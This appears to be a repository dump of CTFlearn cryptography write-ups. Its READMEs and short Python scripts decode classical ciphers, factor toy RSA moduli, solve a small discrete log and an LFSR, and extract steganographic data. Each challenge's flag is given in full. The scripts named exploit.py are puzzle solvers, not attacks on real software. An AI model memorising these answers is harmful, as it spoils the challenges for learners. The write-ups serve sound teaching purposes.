Array of alphabet 4 | arr = np.where(arr <75, arr, arr+1) # Array without 'K' 5 | 6 | cells = ["1-3","4-4","2-1","{","4-4","2-3","4-5","3-2","1-2","4-3","_","4-5","3-5","}"] 7 | for i in cells: 8 | if(ord(i[0])>=48 and ord(i[0])<=57): 9 | x=int(i[0])-1 10 | y=int(i[2])-1 11 | print(chr(arr[x][y]),end="") 12 | else: 13 | print(i[0],end="") 14 | print("\n") -------------------------------------------------------------------------------- /Cryptography/5x5 Crypto/README.md: -------------------------------------------------------------------------------- 1 | ## 5x5 Crypto 2 | The main idea finding the flag is by simple pairs. 3 | 4 | #### Step-1: 5 | After reading the given text: 6 | 7 | `Ever heard of the 5x5 secret message system? If not, basically it's a 5x5 grid with all letters of the alphabet in order, without k because c is represented to make the k sound only. Google it if you need to. A letter is identified by Row-Column. All values are in caps. Try: 1-3,4-4,2-1,{,4-4,2-3,4-5,3-2,1-2,4-3,_,4-5,3-5,}` 8 | 9 | #### Step-2: 10 | So, basically the table is: 11 | 12 | 13 | 14 | We can decode the message according to given inputs in message above to get the flag. 15 | 16 | #### Step-3: 17 | Instead I wrote a `Flag.py` script to get the flag. 18 | 19 | ```py 20 | import numpy as np 21 | 22 | arr = np.arange(65,90).reshape(5, 5) # Array of alphabet 23 | arr = np.where(arr <75, arr, arr+1) # Array without 'K' 24 | 25 | cells = ["1-3","4-4","2-1","{","4-4","2-3","4-5","3-2","1-2","4-3","_","4-5","3-5","}"] 26 | for i in cells: 27 | if(ord(i[0])>=48 and ord(i[0])<=57): 28 | x=int(i[0])-1 29 | y=int(i[2])-1 30 | print(chr(arr[x][y]),end="") 31 | else: 32 | print(i[0],end="") 33 | print("\n") 34 | ``` 35 | 36 | #### Step-4: 37 | 38 | If we execute this script by `python3 Flag.py`, I got the following output: 39 | 40 | ```bash 41 | CTF{THUMBS_UP} 42 | ``` 43 | #### Step-5: 44 | 45 | Finally the flag becomes: 46 | `CTF{THUMBS_UP}` 47 | -------------------------------------------------------------------------------- /Cryptography/5x5 Crypto/Table.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/5x5 Crypto/Table.png -------------------------------------------------------------------------------- /Cryptography/ALEXCTF CR2: Many time secrets/README.md: -------------------------------------------------------------------------------- 1 | ## ALEXCTF CR2: Many time secrets 2 | The main idea finding the flag is decomposing the Hex dump and finding the public key. 3 | 4 | #### Step-1: 5 | After we download `msg(4)` from the cloud, we get the following data. 6 | 7 | `0529242a631234122d2b36697f13272c207f2021283a6b0c79082f28202a302029142c653f3c7f2a2636273e3f2d653e25217908322921780c3a235b3c2c3f207f372e21733a3a2b37263b3130122f6c363b2b312b1e64651b6537222e37377f2020242b6b2c2d5d283f652c2b31661426292b653a292c372a2f20212a316b283c0929232178373c270f682c216532263b2d3632353c2c3c2a293504613c37373531285b3c2a72273a67212a277f373a243c20203d5d 8 | 243a202a633d205b3c2d3765342236653a2c7423202f3f652a182239373d6f740a1e3c651f207f2c212a247f3d2e65262430791c263e203d63232f0f20653f207f332065262c31683137223679182f2f372133202f142665212637222220733e383f2426386b` 9 | 10 | Working out: 11 | https://youtu.be/p4DIab6NKOY?t=307 12 | 13 | The link for this tool is below: 14 | https://github.com/SpiderLabs/cribdrag 15 | 16 | #### Step-2: 17 | 18 | I didn't have complete idea on proceeding on this challenge, so I took help from online and got this. 19 | 20 | https://youtu.be/p4DIab6NKOY?t=307 21 | 22 | #### Step-3: 23 | Alternatively, same flag can be approached in another way also. 24 | 25 | https://www.embeddedhacker.com/2020/01/hacking-walkthrough-ctflearn-crypto-medium/ 26 | 27 | #### Step-4: 28 | Finally the flag becomes: 29 | `ALEXCTF{HERE_GOES_THE_KEY}` -------------------------------------------------------------------------------- /Cryptography/ALEXCTF CR2: Many time secrets/msg (4): -------------------------------------------------------------------------------- 1 | 0529242a631234122d2b36697f13272c207f2021283a6b0c7908 2 | 2f28202a302029142c653f3c7f2a2636273e3f2d653e25217908 3 | 322921780c3a235b3c2c3f207f372e21733a3a2b37263b313012 4 | 2f6c363b2b312b1e64651b6537222e37377f2020242b6b2c2d5d 5 | 283f652c2b31661426292b653a292c372a2f20212a316b283c09 6 | 29232178373c270f682c216532263b2d3632353c2c3c2a293504 7 | 613c37373531285b3c2a72273a67212a277f373a243c20203d5d 8 | 243a202a633d205b3c2d3765342236653a2c7423202f3f652a18 9 | 2239373d6f740a1e3c651f207f2c212a247f3d2e65262430791c 10 | 263e203d63232f0f20653f207f332065262c3168313722367918 11 | 2f2f372133202f142665212637222220733e383f2426386b 12 | -------------------------------------------------------------------------------- /Cryptography/Base 2 2 the 6/Decode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Base 2 2 the 6/Decode.png -------------------------------------------------------------------------------- /Cryptography/Base 2 2 the 6/README.md: -------------------------------------------------------------------------------- 1 | ## Base 2 2 the 6 2 | The main idea finding the flag is $2^6$ = 64. 3 | 4 | #### Step-1: 5 | After we read the message given, 6 | 7 | `Q1RGe0ZsYWdneVdhZ2d5UmFnZ3l9` 8 | 9 | It is clearly Base64 encrypted. 10 | 11 | #### Step-2: 12 | I tried to decode it online here: https://www.base64decode.org/ 13 | 14 | I got the following result: 15 | 16 | 17 | 18 | #### Step-3: 19 | Finally the flag becomes: 20 | `CTF{FlaggyWaggyRaggy}` -------------------------------------------------------------------------------- /Cryptography/BruXOR/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/BruXOR/Flag.png -------------------------------------------------------------------------------- /Cryptography/BruXOR/Input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/BruXOR/Input.png -------------------------------------------------------------------------------- /Cryptography/BruXOR/README.md: -------------------------------------------------------------------------------- 1 | ## BruXOR 2 | The main idea finding the flag is XOR Bruteforce. 3 | 4 | #### Step-1: 5 | After reading the message in the question, 6 | 7 | `There is a technique called bruteforce. Message: q{vpln'bH_varHuebcrqxetrHOXEj No key! Just brute .. brute .. brute ... :D` 8 | 9 | 10 | The first thing I searched online was XOR Bruteforce and I got some helpful results. 11 | 12 | #### Step-2: 13 | I followed the URL: https://www.dcode.fr/xor-cipher 14 | 15 | Since in the message, it is clearly that there is no key, my inputs were as follows: (Only Bruteforce xP) 16 | 17 | 18 | 19 | #### Step-3: 20 | After decrypting, we get the following results, amidst which I found the flag. 21 | 22 | 23 | 24 | #### Step-4: 25 | Finally the flag becomes: 26 | `flag{y0u_Have_bruteforce_XOR}` 27 | -------------------------------------------------------------------------------- /Cryptography/Character Encoding/README.md: -------------------------------------------------------------------------------- 1 | ## Character Encoding 2 | The main idea finding the flag using simple Hex to text conversion. 3 | 4 | #### Step-1: 5 | Generally, I don't criticize any challenge, but this one crossed limits. It was too Ez. xP. 6 | 7 | We have been given simple Hex code: `41 42 43 54 46 7B 34 35 43 31 31 5F 31 35 5F 55 35 33 46 55 4C 7D` 8 | 9 | #### Step-2: 10 | Convert it online here to text: 11 | http://www.unit-conversion.info/texttools/hexadecimal/ 12 | 13 | #### Step-3: 14 | 15 | Finally the flag becomes: 16 | `ABCTF{45C11_15_U53FUL}` -------------------------------------------------------------------------------- /Cryptography/Defying Hell/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Defying Hell/Flag.png -------------------------------------------------------------------------------- /Cryptography/Defying Hell/data.txt: -------------------------------------------------------------------------------- 1 | p: 0x8c5378994ef1b 2 | g: 0x02 3 | 4 | A: 0x269beb3b0e968 5 | B: 0x4757336da6f70 -------------------------------------------------------------------------------- /Cryptography/Defying Hell/exploit.py: -------------------------------------------------------------------------------- 1 | import math 2 | from sympy.ntheory.residue_ntheory import discrete_log 3 | 4 | p = 2468642135797531 5 | g = 2 6 | 7 | # A = g^{a} mod p where a is the secret integer of Alice 8 | A = 679217732839784 9 | # B = g^{b} mod p where b is the secret integer of Bob 10 | B = 1255037608816496 11 | 12 | # Find an integer x in [1, p-1] s.t. g^{x} = A mod p and g^{x} = B mod p. 13 | # Note that the complexity of this computation is exponential as it is the discrete logarithm problem. 14 | x = discrete_log(p, A, 2) 15 | y = discrete_log(p, B, 2) 16 | 17 | if (pow(2, x, p) == A): 18 | a = x 19 | 20 | if (pow(2, y, p) == B): 21 | b = y 22 | 23 | # Compute the secret common key to verify correct keys 24 | k_a = pow(B, a, p) 25 | k_b = pow(A, b, p) 26 | # Note that k = k_a = k_b 27 | k = k_a 28 | 29 | fa_bytes = bytes.fromhex(hex(a)[2:]) 30 | fb_bytes = bytes.fromhex(hex(b)[2:]) 31 | 32 | print("a's secret key is: ", fa_bytes) 33 | print("b's secret key is: ", fb_bytes) 34 | print("Flag: CTFlearn{" + str(fa_bytes.decode()) + "_" + str(fb_bytes.decode()) + "}") -------------------------------------------------------------------------------- /Cryptography/Encryption Master/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/1.png -------------------------------------------------------------------------------- /Cryptography/Encryption Master/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/2.png -------------------------------------------------------------------------------- /Cryptography/Encryption Master/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/3.png -------------------------------------------------------------------------------- /Cryptography/Encryption Master/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/Flag.png -------------------------------------------------------------------------------- /Cryptography/Encryption Master/Here ya go!.txt: -------------------------------------------------------------------------------- 1 | This is NOT going to be fun. TmljZSEgTm93IGtlZXAgZ29pbmcuIDU0Nzc2ZjIwNmQ2ZjcyNjUyZTIwMzAzMTMwMzAzMDMxMzEzMDIwMzAzMTMxMzAzMTMwMzAzMTIwMzAzMTMxMzAzMTMxMzEzMDIwMzAzMTMxMzAzMDMwMzAzMTIwMzAzMTMxMzAzMTMxMzAzMDIwMzAzMDMxMzAzMDMwMzAzMDIwMzAzMTMwMzAzMDMxMzAzMDIwMzAzMTMxMzAzMDMxMzAzMTIwMzAzMTMxMzAzMDMwMzEzMTIwMzAzMTMxMzEzMDMwMzEzMDIwMzAzMTMxMzEzMTMwMzAzMTIwMzAzMTMxMzEzMDMwMzAzMDIwMzAzMTMxMzEzMDMxMzAzMDIwMzAzMTMxMzAzMTMwMzAzMTIwMzAzMTMxMzAzMTMxMzEzMTIwMzAzMTMxMzAzMTMxMzEzMDIwMzAzMDMxMzAzMDMwMzAzMTIwMzAzMDMxMzAzMDMwMzAzMDIwMzAzMTMwMzEzMDMwMzAzMTIwMzAzMDMxMzEzMDMwMzAzMTIwMzAzMTMwMzEzMDMwMzEzMDIwMzAzMTMwMzAzMDMxMzEzMTIwMzAzMTMxMzAzMDMxMzAzMTIwMzAzMDMxMzEzMDMwMzAzMDIwMzAzMTMxMzAzMTMxMzAzMDIwMzAzMTMxMzAzMDMxMzEzMDIwMzAzMTMwMzEzMDMwMzAzMTIwMzAzMTMwMzEzMDMxMzAzMTIwMzAzMDMxMzEzMDMwMzAzMTIwMzAzMTMxMzAzMDMxMzEzMDIwMzAzMTMwMzEzMDMxMzAzMTIwMzAzMTMwMzAzMDMxMzEzMDIwMzAzMTMwMzAzMTMwMzEzMDIwMzAzMTMwMzEzMDMwMzAzMDIwMzAzMTMwMzEzMDMxMzEzMDIwMzAzMTMwMzEzMDMxMzAzMTIwMzAzMTMwMzEzMDMwMzEzMDIwMzAzMTMxMzAzMDMxMzEzMDIwMzAzMTMwMzEzMDMxMzAzMDIwMzAzMDMxMzEzMDMwMzAzMDIwMzAzMTMwMzEzMTMwMzEzMDIwMzAzMTMxMzAzMDMxMzEzMDIwMzAzMTMwMzEzMDMxMzEzMTIwMzAzMTMwMzEzMDMxMzAzMTIwMzAzMDMxMzEzMTMwMzAzMTIwMzAzMTMwMzEzMDMxMzEzMDIwMzAzMTMxMzAzMDMxMzEzMDIwMzAzMTMwMzEzMDMwMzAzMTIwMzAzMDMxMzEzMTMxMzAzMTIwMzAzMDMxMzEzMTMxMzAzMQ== -------------------------------------------------------------------------------- /Cryptography/Hextroadinary/README.md: -------------------------------------------------------------------------------- 1 | ## Hextroadinary 2 | 3 | The main idea finding the flag is to read the question properly and interpret. 4 | 5 | #### Step-1: 6 | 7 | After we read the given message: 8 | 9 | `Meet ROXy, a coder obsessed with being exclusively the worlds best hacker. She specializes in short cryptic hard to decipher secret codes. The below hex values for example, she did something with them to generate a secret code, can you figure out what? Your answer should start with 0x.` 10 | 11 | `0xc4115` `0x4cf8` 12 | 13 | #### Step-2: 14 | 15 | `Meet ROXy` - This should give us a simple idea that we have to XOR the 2 given Hex numbers. 16 | 17 | #### Step-3: 18 | 19 | So I tried it online here: 20 | 21 | http://xor.pw/# 22 | 23 | 24 | 25 | Note: Do not forget `0x` before flag. 26 | 27 | #### Step-7: 28 | Finally the flag becomes: 29 | `CTFlearn{0xc0ded}` -------------------------------------------------------------------------------- /Cryptography/Hextroadinary/xor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Hextroadinary/xor.png -------------------------------------------------------------------------------- /Cryptography/HyperStream Test #2/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/HyperStream Test #2/Flag.png -------------------------------------------------------------------------------- /Cryptography/HyperStream Test #2/README.md: -------------------------------------------------------------------------------- 1 | ## HyperStream Test #2 2 | The main idea finding the flag is to know Baconian Cipher. 3 | 4 | #### Step-1: 5 | After reading the challenge properly, 6 | 7 | ``` 8 | I love the smell of bacon in the morning! 9 | 10 | ABAAAABABAABBABBAABBAABAAAAAABAAAAAAAABAABBABABBAAAAABBABBABABBAABAABABABBAABBABBAABB 11 | ``` 12 | #### Step-2: 13 | It is clear that it has to be Baconian Cipher. Those who are unaware of it, can refer here: 14 | https://en.wikipedia.org/wiki/Bacon%27s_cipher 15 | 16 | I then quickly looked for online Baconian Cipher decoders. 17 | 18 | #### Step-3: 19 | I followed URL: https://www.dcode.fr/bacon-cipher. 20 | 21 | I got the following results: 22 | 23 | 24 | 25 | #### Step-4: 26 | Finally the flag becomes: 27 | `ILOUEBACONDONTYOU` -------------------------------------------------------------------------------- /Cryptography/Image Editing/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/Flag.png -------------------------------------------------------------------------------- /Cryptography/Image Editing/README.md: -------------------------------------------------------------------------------- 1 | ## Image Editing 2 | The main idea finding the flag analyzing the image through steganography tools. 3 | 4 | #### Step-1: 5 | After we download `final.png` from the cloud, we see the following: 6 | 7 | 8 | 9 | #### Step-2: 10 | We proceed by putting it through Stegsolve tool [here](https://wiki.bi0s.in/steganography/stegsolve/). 11 | 12 | #### Step-3: 13 | By choosing what option we need by basing on zsteg return on that image `b1`, `r`, `lsb`, `xy` (`b1` for the byte, `r` is for red color, `lsb` algorithm, `xy` position of image we can receive) and we extract there. 14 | 15 | 16 | 17 | #### Step-4: 18 | We save that image with `.png` format because look on the text of the hex file and PNG is the first thing visible. 19 | 20 | 21 | 22 | #### Step-5: 23 | We then just run the command `zsteg .png` [reference](https://wiki.bi0s.in/steganography/zsteg/) to get the final flag as follows: 24 | 25 | 26 | #### Step-6: 27 | Finally the flag becomes: 28 | `CTFlearn{1_kn3W_tH3_r3D_w4s_0ff}` -------------------------------------------------------------------------------- /Cryptography/Image Editing/exploit.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import cv2 3 | 4 | df = cv2.imread('final.png') 5 | 6 | df = np.mod(df[:, :, 2], 2) 7 | with open('half.png', 'wb') as f: 8 | f.write(bytes(np.packbits(df))) 9 | 10 | df = cv2.imread('half.png') 11 | df = np.mod(df[:, :, 2], 2) 12 | print(bytes(np.packbits(df))) -------------------------------------------------------------------------------- /Cryptography/Image Editing/final.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/final.png -------------------------------------------------------------------------------- /Cryptography/Image Editing/half.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/half.png -------------------------------------------------------------------------------- /Cryptography/Image Editing/stegsolve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/stegsolve.png -------------------------------------------------------------------------------- /Cryptography/Linear-feedback. Shift. Register/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/Flag.png -------------------------------------------------------------------------------- /Cryptography/Linear-feedback. Shift. Register/PRNG.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/PRNG.zip -------------------------------------------------------------------------------- /Cryptography/Linear-feedback. Shift. Register/description.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/description.png -------------------------------------------------------------------------------- /Cryptography/Linear-feedback. Shift. Register/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | def msb(num, pos): 4 | ret = (num & (1 << pos[0])) >> pos[0] 5 | 6 | for p in pos[1:]: 7 | ret ^= (num & (1 << p)) >> p 8 | return ret 9 | 10 | def get_next(last, pos): 11 | m = msb(last, pos) 12 | return (m << 7)|(last >> 1) 13 | 14 | def decode(): 15 | msb_pos = [6,5,3,2,0] 16 | last = 0 17 | last = prefix[-1] ^ cipher[len(prefix)-1] 18 | 19 | output='' 20 | for i in range(len(prefix), len(cipher)): 21 | last = get_next(last, msb_pos) 22 | output += chr(cipher[i] ^ last) 23 | 24 | print(prefix+output.encode()) 25 | 26 | cipher = open('secretMessage.hex', 'rb').read() 27 | prefix = b"CTFlearn{" 28 | 29 | decode() 30 | -------------------------------------------------------------------------------- /Cryptography/Linear-feedback. Shift. Register/secretMessage.hex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/secretMessage.hex -------------------------------------------------------------------------------- /Cryptography/Modern Gaius Julius Caesar/README.md: -------------------------------------------------------------------------------- 1 | ## Modern Gaius Julius Caesar 2 | The main idea to find the flag is to observe keyboard properly. 3 | 4 | #### Step-1: 5 | We are given this text `BUH'tdy,|Bim5y~Bdt76yQ`. 6 | 7 | Description: 8 | ``` 9 | One of the easiest and earliest known ciphers but with XXI century twist! Nobody uses 10 | Alphabet nowadays right? Why should you when you have your keyboard? 11 | ``` 12 | #### Step-2: 13 | Clearly, first letters of the decrypted message have to be `CTF...` 14 | 15 | #### Step-3: 16 | So, I observed the pattern and I got that to decrypt the given message we have to go 2 keys left on a standard QWERTY English Keyboard. 17 | 18 | Therefore, `BUH'tdy,|Bim5y~Bdt76yQ` = `CTFlearn{Cyb3r_Cae54r}` 19 | 20 | #### Step-4: 21 | Finally, the flag becomes: 22 | `CTFlearn{Cyb3r_Cae54r}` -------------------------------------------------------------------------------- /Cryptography/Morse Code/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Morse Code/Flag.png -------------------------------------------------------------------------------- /Cryptography/Morse Code/README.md: -------------------------------------------------------------------------------- 1 | ## Morse Code 2 | The main idea finding the flag is just having knowledge about Morse Code. 3 | 4 | #### Step-1: 5 | 6 | This is the message given to us: 7 | 8 | `..-. .-.. .- --. ... .- -- ..- . .-.. -- --- .-. ... . .. ... -.-. --- --- .-.. -... -.-- - .... . .-- .- -.-- .. .-.. .. -.- . -.-. .... . . ...` 9 | 10 | #### Step-2: 11 | I used this URL to decode our answer: 12 | https://cryptii.com/pipes/morse-code-to-text 13 | 14 | #### Step-3: 15 | This was my output: 16 | 17 | 18 | 19 | That's it. That's our flag. 20 | 21 | #### Step-4: 22 | 23 | Finally the flag becomes: 24 | `flagsamuelmorseiscoolbythewayilikechees` -------------------------------------------------------------------------------- /Cryptography/Nasty Little Doctorses!/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Nasty Little Doctorses!/Flag.png -------------------------------------------------------------------------------- /Cryptography/Nasty Little Doctorses!/README.md: -------------------------------------------------------------------------------- 1 | ## Nasty Little Doctorses! 2 | The main idea finding the flag is simple Google search. 3 | 4 | #### Step-1: 5 | After I read the hash: `bafa3de6dac066cebe8c0e5670d98935`, I tried to decrypt using MD-5 hash database. 6 | But turns out it was reverse hash. What to do now? 7 | 8 | 9 | #### Step-2: 10 | For random results to trail on, I searched on Google, and luckily got the flag in top searches. 11 | 12 | https://md5.gromweb.com/?string=CTF%7BMD5_is_Nasty%7D 13 | 14 | 15 | 16 | ###### Dunno, why this challenge was in Hard? 17 | 18 | #### Step-3: 19 | Finally the flag becomes: 20 | `CTF{MD5_is_Nasty}` -------------------------------------------------------------------------------- /Cryptography/RSA Beginner/Flag.py: -------------------------------------------------------------------------------- 1 | import gmpy2 2 | from gmpy2 import mpz 3 | 4 | e=mpz(3) 5 | c=mpz(219878849218803628752496734037301843801487889344508611639028) 6 | n=mpz(245841236512478852752909734912575581815967630033049838269083) 7 | 8 | #use factordb 9 | q=mpz(416064700201658306196320137931) 10 | p=mpz(590872612825179551336102196593) 11 | 12 | phi=gmpy2.mul(p-1,q-1) 13 | d=gmpy2.invert(e,phi) 14 | f=gmpy2.powmod(c,d,n) 15 | g=bytes.fromhex(hex(f)[2:]) 16 | 17 | print("[+] Flag is : ",g) 18 | -------------------------------------------------------------------------------- /Cryptography/RSA Beginner/README.md: -------------------------------------------------------------------------------- 1 | ## RSA Beginner 2 | The main idea finding the flag using RSA function and its operations. 3 | 4 | #### Step-1: 5 | After we download `rsa (1).txt` from the cloud, we try to understand what is the content. 6 | 7 | If anyone is unaware of RSA Encryption, they can checkout here: 8 | 9 | https://en.wikipedia.org/wiki/RSA_(cryptosystem) 10 | 11 | #### Step-2: 12 | The contents of `rsa (1).txt` are as follows: 13 | 14 | ``` 15 | e: 3 16 | c: 219878849218803628752496734037301843801487889344508611639028 17 | n: 245841236512478852752909734912575581815967630033049838269083 18 | ``` 19 | #### Step-3: 20 | We run a simple `Flag.py` script to get the flag. 21 | 22 | ```py 23 | import gmpy2 24 | from gmpy2 import mpz 25 | 26 | e=mpz(3) 27 | c=mpz(219878849218803628752496734037301843801487889344508611639028) 28 | n=mpz(245841236512478852752909734912575581815967630033049838269083) 29 | 30 | #use factordb 31 | q=mpz(416064700201658306196320137931) 32 | p=mpz(590872612825179551336102196593) 33 | 34 | phi=gmpy2.mul(p-1,q-1) 35 | d=gmpy2.invert(e,phi) 36 | f=gmpy2.powmod(c,d,n) 37 | g=bytes.fromhex(hex(f)[2:]) 38 | 39 | print("[+] Flag is : ",g) 40 | ``` 41 | #### Step-4: 42 | The output of `python3 Flag.py` is as follows: 43 | 44 | `[+] Flag is : b'abctf{rs4_is_aw3s0m3}'` 45 | 46 | #### Step-5: 47 | Finally the flag becomes: 48 | `abctf{rs4_is_aw3s0m3}` 49 | -------------------------------------------------------------------------------- /Cryptography/RSA Beginner/rsa (1).txt: -------------------------------------------------------------------------------- 1 | e: 3 2 | c: 219878849218803628752496734037301843801487889344508611639028 3 | n: 245841236512478852752909734912575581815967630033049838269083 4 | -------------------------------------------------------------------------------- /Cryptography/RSA Noob/Factorize.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/RSA Noob/Factorize.png -------------------------------------------------------------------------------- /Cryptography/RSA Noob/Flag.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import inverse 2 | import binascii 3 | 4 | e = 1 5 | c = 9327565722767258308650643213344542404592011161659991421 6 | n = 245841236512478852752909734912575581815967630033049838269083 7 | 8 | # From factordb 9 | 10 | p = 416064700201658306196320137931 11 | q = 590872612825179551336102196593 12 | 13 | phi = (p-1) * (q-1) 14 | 15 | d = inverse(e,phi) 16 | m = pow(c,d,n) 17 | 18 | hex_str = hex(m)[2:] # Removing '0x' 19 | print(binascii.unhexlify(hex_str)) -------------------------------------------------------------------------------- /Cryptography/RSA Noob/rsanoob (1).txt: -------------------------------------------------------------------------------- 1 | e: 1 2 | c: 9327565722767258308650643213344542404592011161659991421 3 | n: 245841236512478852752909734912575581815967630033049838269083 4 | -------------------------------------------------------------------------------- /Cryptography/Reverse Polarity/Covert.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Reverse Polarity/Covert.png -------------------------------------------------------------------------------- /Cryptography/Reverse Polarity/README.md: -------------------------------------------------------------------------------- 1 | ## Reverse Polarity 2 | The main idea finding the flag is Binary to ASCII conversion. 3 | 4 | #### Step-1: 5 | After seeing the text, we get the following: 6 | `I got a new hard drive just to hold my flag, but I'm afraid that it rotted. What do I do? The only thing I could get off of it was this: ` 7 | 8 | ``` 9 | 01000011010101000100011001111011010000100110100101110100010111110100011001101100011010010111000001110000011010010110111001111101 10 | ``` 11 | 12 | I tried to convert the given Binary text to ASCII. 13 | 14 | #### Step-2: 15 | I followed the URL: https://www.convertbinary.com/to-text/ 16 | 17 | I got the following result: 18 | 19 | 20 | 21 | Voila, we have it. 22 | #### Step-3: 23 | 24 | Finally the flag becomes: 25 | `CTF{Bit_Flippin}` 26 | -------------------------------------------------------------------------------- /Cryptography/Skynet Is (Almost) Taking Over/README.md: -------------------------------------------------------------------------------- 1 | ## Skynet Is (Almost) Taking Over 2 | 3 | 4 | #### Step-1: 5 | This is the most elegant I could find. 6 | 7 | https://mikelgarcialarragan.blogspot.com/2018/08/criptografia-cix-solucion-reto-ctflearn.html 8 | 9 | #### Step-2: 10 | Finally, the flag becomes: 11 | `flag {will_he_be_back}` -------------------------------------------------------------------------------- /Cryptography/Skynet Is (Almost) Taking Over/Skynet.txt: -------------------------------------------------------------------------------- 1 | e: 65537 2 | 3 | c1: 5024836662627906750454817701922271080214720765897113783786369197810770999608528443597447448508876214100063962982376037712548944474807897847869334582773452689962992522987755069402952836848501053684233233850594080254869 4 | n1: 10603199174122839808738169357706062732533966731323858892743816728206914395320609331466257631096646511986506501272036007668358071304364156150345138983648630874220488837685118753574424686204595981514561343227316297317899 5 | 6 | c2: 130884437483098301339042672379318680582507704056215246672305503902799253294397268030727540524911640778691710963573363763216872030631281953772411963153320471648783848323158455504315739311667392161460121273259241311534 7 | n2: 5613358668671613665566510382994441407219432062998832523305840186970780370368271618683122274081615792349154210168307159475914213081021759597948038689876676892007399580995868266543309872185843728429426430822156211839073 8 | 9 | c3: 40136988332296795741662524458025734893351353026652568277369126873536130787573840288544348201399567767278683800132245661707440297299339161485942455489387697524794283615358478900857853907316854396647838513117062760230880 10 | n3: 43197226819995414250880489055413585390503681019180594772781599842207471693041753129885439403306011423063922105541557658194092177558145184151460920732675652134876335722840331008185551706229533179802997366680787866083523 11 | -------------------------------------------------------------------------------- /Cryptography/So many 64s/README.md: -------------------------------------------------------------------------------- 1 | ## Base 2 2 the 6 2 | The main idea finding the flag is Base64 decryption. 3 | 4 | #### Step-1: 5 | After I downloaded `flag.txt`, I got a humungous Base64 encrypted message. 6 | 7 | #### Step-2: 8 | So, when I tried to decrypt in online, it gave huge cipher again. So, I had to write a script to get the flag. 9 | 10 | #### Step-3: 11 | The `exploit.py` has the script. 12 | 13 | ```python 14 | import base64 15 | 16 | f = open('flag.txt', 'r') 17 | text = f.read() 18 | 19 | while 1: 20 | text = base64.b64decode(text).decode('utf-8') 21 | 22 | if '{' in text: 23 | print(text) 24 | #continue 25 | break 26 | ``` 27 | 28 | #### Step-4: 29 | 30 | So finally, when I ran the script by `python3 exploit.py`, I got the flag. 31 | 32 | #### Step-5: 33 | Finally the flag becomes: 34 | `ABCTF{pr3tty_b4s1c_r1ght?}` -------------------------------------------------------------------------------- 